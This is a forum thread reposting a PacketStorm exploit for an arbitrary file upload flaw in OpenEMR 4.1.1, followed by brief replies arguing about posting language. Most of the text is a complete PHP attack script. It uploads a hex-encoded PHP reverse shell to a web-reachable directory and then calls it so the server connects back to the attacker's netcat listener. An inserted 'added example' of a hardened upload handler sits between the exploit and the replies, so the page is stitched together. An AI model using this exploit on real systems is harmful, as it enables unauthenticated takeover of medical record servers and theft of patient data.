Praetorian503 Posted February 13, 2013

OpenEMR version 4.1.1 suffers from an arbitrary file upload vulnerability in ofc_upload_image.php. Included is an exploit that triggers a reverse shell.

<?php
/*
OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability

Vendor: OpenEMR
Product web page: http://www.open-emr.org
Affected version: 4.1.1

Summary: OpenEMR is a Free and Open Source electronic health records and medical
practice management application that can run on Windows, Linux, Mac OS X, and many
other platforms.

Desc: The vulnerability is caused due to the improper verification of uploaded
files in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script
thru the 'name' parameter. This can be exploited to execute arbitrary PHP code
by uploading a malicious PHP script with multiple extensions.

================================================================================

/library/openflashchart/php-ofc-library/ofc_upload_image.php:
-------------------------------------------------------------

21: $default_path = '../tmp-upload-images/';
23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);
26: $destination = $default_path . basename( $_GET[ 'name' ] );
28: echo 'Saving your image to: '. $destination;
39: $jfh = fopen($destination, 'w') or die("can't open file");
40: fwrite($jfh, $HTTP_RAW_POST_DATA);
41: fclose($jfh);
46: exit();

================================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Fedora Linux
           Apache2, PHP 5.4
           MySQL 5.5

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5126
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php

09.02.2013

*/

error_reporting(0);
set_time_limit(0);

$go = "\033[0;92m"; $no = "\033[0;37m";
echo $no;

$host = $argv[1];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if(!$sock){ echo "\n> $errstr ($errno)\n"; die();}

// Turns the hex-encoded payload string back into its original bytes.
function r_shell($sc){
    $exec = '';
    for($z = 0; $z < strlen($sc); $z += 2) $exec .= chr(hexdec(substr($sc,$z,2)));
    return $exec;
}

print "\n+--------------------------------------------------------+";
print "\n+                                                        +";
print "\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth)  +";
print "\n+                                                        +";
print "\n+ ID: ZSL-2013-5126                                      +";
print "\n+                                                        +";
print "\n+ Copyleft (c) 2013, Zero Science Lab                    +";
print "\n+                                                        +";
print "\n+--------------------------------------------------------+\n\n";

// PoC for Linux
// Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234

if ($argc < 2){
    print "\n> Usage: php $argv[0] <target>\n\n";
    die();
}

$pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974". "202830293b0d0a". "246970203d2027". "3132372e302e30". "2e31273b0d0a24". "706f7274203d20".
"313233343b0d0a". "246368756e6b5f". "73697a65203d20". "313430303b0d0a". "2477726974655f". "61203d206e756c". "6c3b2024657272". "6f725f61203d20".
"6e756c6c3b0d0a". "247368656c6c20". "3d2027756e616d". "65202d613b2077". "3b2069643b202f". "62696e2f736820". "2d69273b0d0a24". "6461656d6f6e20".
"3d20303b202464". "65627567203d20". "303b0d0a696620". "2866756e637469". "6f6e5f65786973". "7473282770636e". "746c5f666f726b". "272929207b0d0a".
"24706964203d20". "70636e746c5f66". "6f726b28293b0d". "0a696620282470". "6964203d3d202d".
"3129207b0d0a70". "72696e74697428". "224552524f523a". "2043616e277420". "666f726b22293b". "20657869742831". "293b7d0d0a6966". "20282470696429". "207b6578697428". "30293b7d0d0a69". "662028706f7369". "785f7365747369". "642829203d3d20". "2d3129207b0d0a". "7072696e746974". "28224572726f72". "3a2043616e2774". "20736574736964". "282922293b2065". "7869742831293b". "7d0d0a24646165". "6d6f6e203d2031". "3b7d20656c7365". "207b0d0a707269". "6e746974282257". "41524e494e473a". "204661696c6564". "20746f20646165". "6d6f6e6973652e". "20205468697320". "69732071756974". "6520636f6d6d6f". "6e20616e64206e". "6f742066617461". "6c2e22293b7d0d". "0a636864697228". "222f22293b2075". "6d61736b283029". "3b0d0a24736f63". "6b203d2066736f". "636b6f70656e28". "2469702c202470". "6f72742c202465". "72726e6f2c2024". "6572727374722c". "203330293b0d0a". "69662028212473". "6f636b29207b0d". "0a7072696e7469". "74282224657272". "73747220282465". "72726e6f292229". "3b206578697428". "31293b7d0d0a24". "64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270". "697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d". "0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d". "2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470". "69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d". "0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d". "0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573". "5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31". "5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c". "2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a". "7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073". "68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620". 
"2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c". "20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620". "2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053". "68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472". "6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573". "5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73". "656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c". "6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a". "6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e". "707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028". "24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269". "7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928". "2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072". "696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428". "2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920". "7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f". "636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c". "2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444". "455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c". "20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253". "54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574". "293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d". "293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b". "325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20". "7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070". 
"72696e74202224737472696e675c6e223b7d7d0d0a3f3e"); //PHP Reverse Shell, PTMNKY.

echo "\n> Writing reverse shell file";
$pckt = "POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\r\n";
$pckt .= "Host: {$host}\r\n";
$pckt .= "Content-Length: ".strlen($pl)."\r\n\r\n{$pl}";
fputs($sock, $pckt);
sleep (2);
print " ...."; echo $go."[OK]"; echo $no;

echo "\n> Calling your listener";
$pckt = "GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\r\n";
$pckt .= "Host: {$host}\r\n";
$pckt .= "Connection: Keep-Alive\r\n\r\n";
fputs($sock, $pckt);
sleep (2);
print " ........."; echo $go."[OK]"; echo $no."\n";

// interact_sh();

echo "\n> Enjoy!\n\n";

?>

Source: PacketStorm
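The handler quoted in the advisory (lines 21-46) writes the raw POST body to whatever basename($_GET['name']) says, under a directory the web server serves. The following is an added example of a hardened replacement; it is not OpenEMR's code and not part of the advisory, and the storage path, size cap and PHP 7.1+ are assumptions:

```php
<?php
// Added example (not OpenEMR's code and not part of the advisory): a hardened
// replacement for the handler quoted at lines 21-46. The original writes the
// raw POST body to basename($_GET['name']) inside a web-reachable directory,
// so "name=anything.php" yields an executable script. Here the client's name
// is ignored, the type is decided from the bytes, and the file lands outside
// the web root under a server-generated name. Paths and limits are assumed.

$upload_dir = '/var/lib/app-private/chart-images/'; // assumed: not served by Apache
$max_bytes  = 2 * 1024 * 1024;                       // assumed 2 MiB cap
$allowed    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function fail(string $msg): void {
    http_response_code(400);
    header('Content-Type: text/plain');
    echo $msg;
    exit;
}

// The advisory calls the bug pre-auth; a real handler also sits behind the
// application's session check (not shown here).
if ($_SERVER['REQUEST_METHOD'] !== 'POST') fail('POST required');

// Read at most cap+1 bytes so an oversized body is detected, not trusted.
$data = file_get_contents('php://input', false, null, 0, $max_bytes + 1);
if ($data === false || $data === '') fail('empty upload');
if (strlen($data) > $max_bytes)      fail('upload too large');

// Decide the extension from the content, never from $_GET['name'].
$mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($data);
if (!isset($allowed[$mime]))                 fail('not an allowed image type');
if (@getimagesizefromstring($data) === false) fail('not a decodable image');

// Opaque server-generated name: nothing from the request reaches the path.
$filename = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
$path     = $upload_dir . $filename;

if (!is_dir($upload_dir) && !mkdir($upload_dir, 0750, true)) fail('storage unavailable');

// 'x' mode creates the file and fails if it already exists (no overwrite).
$fh = @fopen($path, 'x');
if ($fh === false) fail('could not create file');
fwrite($fh, $data);
fclose($fh);
chmod($path, 0640);

header('Content-Type: text/plain');
echo $filename; // the caller keeps this id; a separate read-only handler serves the bytes
```

Because the stored file is never reachable by URL and its name never comes from the request, the "multiple extensions" trick described in the advisory has nothing to act on.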
DeCrew Posted February 13, 2013

Do you think you could post in Romanian? After all, this is a forum for Romanians.
Praetorian503 Posted February 13, 2013

> Do you think you could post in Romanian? After all, this is a forum for Romanians.

What am I, a translator? Should I translate every post I make?
Go to school, learn a bit of English; if that doesn't work out, Google is your friend.
Posers.
Praetorian503 Posted February 13, 2013

> That was really lame, Praetorian. Do you think you could find me something for phpmelody on packetstorm?!

You've got enough 'experts', now that you're offering services too.